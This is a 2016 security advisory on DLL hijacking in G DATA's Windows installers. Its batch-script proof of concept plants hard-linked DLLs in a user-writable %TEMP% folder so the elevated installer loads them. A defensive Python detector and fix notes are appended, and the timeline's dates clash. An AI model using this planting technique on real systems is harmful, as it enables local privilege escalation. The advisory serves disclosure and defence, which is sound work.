G-Data DLL Hijacking

2016.04.20
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Hi @ll,

the executable installers of G-Data's "security" products for Windows, available from <https://www.gdata.de/downloads>, allow escalation of privilege!

The downloadable executables are self-extractors containing the real executable installer as resource: they create the subdirectory %TEMP%\{guidguid-guid-guid-guid-guidguidguid} using another resource containing the hardcoded value of this GUID, extract the real executable installer into it and finally start it.

The permissions of this subdirectory allow "full access" for the unprivileged user who started the self-extractor, enabling him to create arbitrary files in this subdirectory.

The real installer loads multiple Windows system DLLs from this subdirectory instead of Windows' "system directory" %SystemRoot%\System32\ and executes them with elevated rights. On Windows 7: dbghelp.dll, dnsapi.dll, oleacc.dll, netapi32.dll, netutils.dll, srvcli.dll, wkscli.dll, version.dll, uxtheme.dll/dwmapi.dll, cryptsp.dll, ncrypt.dll, bcrypt.dll, profapi.dll, msimg32.dll, riched32.dll, iphlpapi.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, sensapi.dll, rasadhlp.dll, ntmarta.dll, ntshrui.dll, cscapi.dll, slc.dll, windowscodecs.dll, apphelp.dll, mpr.dll, userenv.dll, schannel.dll, credssp.dll, secur32.dll, gpapi.dll, samcli.dll

See <https://cwe.mitre.org/data/definitions/379.html> for the well-known and well-documented unsafe TEMP directory vulnerability, and <https://cwe.mitre.org/data/definitions/426.html>, <https://cwe.mitre.org/data/definitions/427.html> plus <https://capec.mitre.org/data/definitions/471.html> for the well-known and well-documented unsafe DLL search path vulnerability.

Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. visit <http://home.arcor.de/skanthak/sentinel.html>, download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> and save it in your "Downloads" directory;

2. download "G DATA ANTIVIRUS" from <https://www.gdata.de/downloads> and save it in your "Downloads" directory (the resulting file is named G_DATA_AntiVirus.exe);

3. create the following file as SENTINEL.CMD in your "Downloads" directory:

--- SENTINEL.CMD ---
G_DATA_AntiVirus.exe
:LOOP
If Not Exist "%TEMP%\{1C2DF59B-0172-4ECB-9A25-7597A4A26A96}\INT_R_BASE_AV.exe" Goto :LOOP
For %%! In (dbghelp dnsapi oleacc netapi32 netutils srvcli wkscli version uxtheme dwmapi cryptsp ncrypt bcrypt profapi msimg32 riched32 iphlpapi winnsi rasapi32 rasman rtutils sensapi rasadhlp ntmarta ntshrui cscapi slc windowscodecs apphelp mpr userenv schannel credssp secur32 gpapi samcli) Do MkLink /H "%TEMP%\{1C2DF59B-0172-4ECB-9A25-7597A4A26A96}\%%!.dll" "%~dpn0.dll"
--- EOF ---

4. run the batch script per double-click: it starts the downloaded self-extractor and plants the DLLs for hijacking;

5. notice the message boxes displayed from the DLLs.

PWNED!

stay tuned
Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's errors. It's a tell-tale sign to better stay away from it!

Timeline:
~~~~~~~~~

2016-06-03 initial report sent to vendor: they provided their real installers for download, allowing DLL hijacking in the users' "Downloads" directory
2016-03-06 vendor acknowledges receipt: "At the moment we are exploring the best way to fix it."
2016-04-13 reply from vendor: "We replaced all installers and tools in the download area with secure versions."
2016-04-17 No, these "installers" are NOT secure, they use UNSAFE temp directories and just shift the attack vector a tiny little bit.
2016-04-18 reply from vendor: "We assume that this is pure speculation."
2016-04-18 OUCH! <https://bugzilla.mozilla.org/show_bug.cgi?id=811557>, <https://code.google.com/p/google-security-research/issues/detail?id=440>
2016-04-18 reply from vendor: "the attacker needs access to the system for that."
2016-04-18 report published
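The flaw described above has a clear telemetry signature: a process running at high integrity maps a DLL whose name belongs to %SystemRoot%\System32 from a path under the user's %TEMP% or "Downloads" directory. The following Python script is an added example written for this page, not code from the advisory or from G DATA. It scores Sysmon-style image-load records against the DLL list in the advisory; the records are constructed (Event ID 7's Image/ImageLoaded fields joined with the process's IntegrityLevel from its Event ID 1 record), the user name and the WinSxS assembly name are made up, and the GUID directory and installer name are taken from the advisory.

```python
"""Flag Windows system DLLs resolved from a user-writable directory.

Added example for this advisory; it is not code from the report or from
G DATA. The records below are constructed in the shape of Sysmon "image
loaded" events (Event ID 7: Image, ImageLoaded) joined with the process's
IntegrityLevel from its Event ID 1 record. Sysmon Event ID 7 itself does
not carry the integrity level, hence the join.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# DLL names the advisory lists as loaded from the %TEMP%\{GUID} directory
# on Windows 7. All of them ship in %SystemRoot%\System32 and should never
# be resolved from a location a standard user can write to.
SYSTEM_DLLS = frozenset(f"{n}.dll" for n in """
dbghelp dnsapi oleacc netapi32 netutils srvcli wkscli version uxtheme dwmapi
cryptsp ncrypt bcrypt profapi msimg32 riched32 iphlpapi winnsi rasapi32 rasman
rtutils sensapi rasadhlp ntmarta ntshrui cscapi slc windowscodecs apphelp mpr
userenv schannel credssp secur32 gpapi samcli
""".split())

# Directories a system DLL may legitimately be mapped from (Windows 7 layout).
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")

# Path fragments identifying per-user writable locations (CWE-379 / CWE-427).
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\downloads\\")


@dataclass(frozen=True)
class ImageLoad:
    image: str            # process whose loader resolved the DLL
    image_loaded: str     # full path of the DLL that was actually mapped
    integrity_level: str  # Low / Medium / High / System (from Event ID 1)


def dll_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def in_trusted_dir(path: str) -> bool:
    parent = str(PureWindowsPath(path).parent).lower()
    return any(parent == d or parent.startswith(d + "\\") for d in TRUSTED_DIRS)


def in_user_writable_dir(path: str) -> bool:
    p = path.lower()
    return any(m in p for m in USER_WRITABLE_MARKERS)


def classify(load: ImageLoad) -> Optional[str]:
    """Return a severity label for a suspicious load, or None if it is benign."""
    if dll_name(load.image_loaded) not in SYSTEM_DLLS:
        return None                      # not one of the DLLs we care about
    if in_trusted_dir(load.image_loaded):
        return None                      # resolved from System32/SysWOW64/WinSxS
    if in_user_writable_dir(load.image_loaded):
        if load.integrity_level in ("High", "System"):
            return "HIGH"                # the advisory's case: elevated installer
        return "MEDIUM"                  # same search-path flaw, no privilege gain
    return "LOW"                         # unexpected location, but not user-writable


def scan(loads: List[ImageLoad]) -> List[Tuple[str, str, str]]:
    """Return (severity, process, dll path) for every suspicious load."""
    findings = []
    for load in loads:
        sev = classify(load)
        if sev:
            findings.append((sev, load.image, load.image_loaded))
    return findings


# Constructed sample: the advisory's installer resolving DLLs, plus benign noise.
TEMP_DIR = r"C:\Users\alice\AppData\Local\Temp\{1C2DF59B-0172-4ECB-9A25-7597A4A26A96}"
INSTALLER = TEMP_DIR + r"\INT_R_BASE_AV.exe"
SAMPLE_LOADS = [
    ImageLoad(INSTALLER, TEMP_DIR + r"\version.dll", "High"),        # the advisory's case
    ImageLoad(INSTALLER, r"C:\Windows\System32\dnsapi.dll", "High"),  # correct resolution
    ImageLoad(r"C:\Windows\notepad.exe", r"C:\Users\alice\Downloads\uxtheme.dll", "Medium"),
    ImageLoad(r"C:\Program Files\App\app.exe", r"C:\Program Files\App\zlib1.dll", "Medium"),
    ImageLoad(INSTALLER, r"C:\Windows\winsxs\x86_constructed-assembly-name\dwmapi.dll", "High"),
]

if __name__ == "__main__":
    for sev, proc, dll in scan(SAMPLE_LOADS):
        print(f"{sev:6} {proc} -> {dll}")
```

Two points about the design. The PoC plants hard links (MkLink /H), but the loader still reports the %TEMP% path as ImageLoaded, so a path-based rule is not fooled by the link; a hash- or signature-based rule would be, since the mapped bytes are whatever the link points at. And the rule only detects the symptom: the installer-side fix is a TEMP subdirectory with an ACL that grants the unprivileged user no write access, combined with loading system DLLs by full path or restricting the search path (on Windows 7 with KB2533623, SetDefaultDllDirectories with LOAD_LIBRARY_SEARCH_SYSTEM32), so that a writable application directory is never consulted.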


Copyright 2024, cxsecurity.com